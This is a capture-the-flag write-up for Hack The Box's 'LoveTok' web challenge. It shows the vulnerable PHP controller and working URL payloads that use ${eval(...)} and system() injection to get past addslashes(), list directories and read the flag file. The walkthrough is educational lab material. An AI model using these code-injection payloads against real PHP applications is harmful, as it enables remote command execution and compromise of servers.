Love-Tok Write up HTB

By /

Last updated on May 5th, 2024 at 12:06 pm

Table of Contents

Description:

True love is tough and even harder to find. Once the sun has set, the lights close and the bell has rung… you find yourself licking your wounds and contemplating human existence. You wish to have somebody important in your life to share the experiences that come with it, the good and the bad. This is why we made LoveTok, the brand new service that accurately predicts in the threshold of milliseconds when love will come knockin’ (at your door). Come and check it out, but don’t try to cheat love because love cheats back. đź’›

Go to hack the box and click on start Instance

It gives the Host address

It gives the Host address

Paste the host address on the browser. it is showing like this please check the below image

If we clicked on the “Nah, that doesn’t work for me. Try again!” button, a new time will be shown. However, we will notice the URL has changed where “?format=r” has been appended

http://134.122.106.163:30222/?format=r
 <?php
class TimeController
{
    public function index($router)
    {
        $format = isset($_GET['format']) ? $_GET['format'] : 'r';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}
http://134.122.106.163:30222/?format=${eval($_GET[1])}&1=system(ls);

As the 1 variable is actually self-defined and goes through eval, its result is parsed and referenced through the PHP eval function on the challenge source code and does not actually go through the addslashes() function, at least not in a direct way. So we could use quotes in our self-referenced variable and the following way:

http://134.122.106.163:30222/?format=${eval($_GET[1])}&1=system('ls%20../');

ls command on / directory

http://134.122.106.163:30222/?format=${print(`cat /flag*`)} 
                                    or 
http://134.122.106.163:30222/?format=${system($_GET[1])}&1=cat+/flagIVmuX
FLAG : HTB{wh3n_l0v3_Redacted_p0pp1ng}

Conclusion:

There are various ways to bypass an addslashes() restriction filter when user input is provided to the eval() php function . There might even a broader attack surface as the addslashes restriction payload bypass described above might be applicable to other kind of attacks in some specific cases, such as an SQL Injection, Command Injection attack.

Thanks For Reading

Happy Hacking !!!

, ,

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top